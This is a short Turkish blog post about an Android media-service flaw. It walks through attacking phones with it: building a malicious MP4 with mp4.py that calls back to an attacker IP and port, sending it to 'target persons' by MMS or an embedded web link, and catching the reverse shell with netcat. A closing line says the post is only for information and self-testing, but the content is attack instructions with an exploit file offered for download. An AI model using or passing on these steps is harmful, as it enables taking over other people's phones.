Murat Şişman

Senior Mobile Developer & Cyber Security Researcher (Sigint)


 

Android Telefonlarınız Güvende mi?

September 17, 2016admin0 Comments

Android işletim sistemine sahip Telefon veya tabletleriniz çok basit bir yöntem ile başkaları tarafından ele geçirilebilir. İşletim sistemindeki Media servisindeki açıktan faydalanılarak geliştirilen Exploit ile yalnızca bir MP4 videosunu çalıştırmanız hackerların cihazınızda ROOT yetkisine sahip olması için yeterli.

Exploit Kullanımı


mp4.py dosyadı ile hedef cihazlarda çalıştırılacak olan MP4 dosyasını yaratıyoruz.

-bash-4.2# python mp4.py -c 192.168.1.10 -p 7777 -o video.mp4
[*] Saving crafted MP4 to video.mp4 …
-bash-4.2#

Daha sonra oluşturulan video.mp4 dosyasını MMS yardımıyla veya web sitesine embed ederek linkini hedef kişilere gönderiyoruz. Hedef videoyu başlatmak istediğinde 192.168.1.10 olarak belirttiğimiz kendi cihazımıza 7777 portundaki shell’e bağlantı kuracaktır

Netcat ile Port açmak için 

-bash-4.2# nc -l -p 7777

Exploit Dosyaları

mp4.py

 

Not: Bu makaledeki içeik ve ekler tamamen bilgilendirme ve kişisel güvenliğinizi test etmeniz için hazırlanmıştır

Yazan: Murat ŞİŞMAN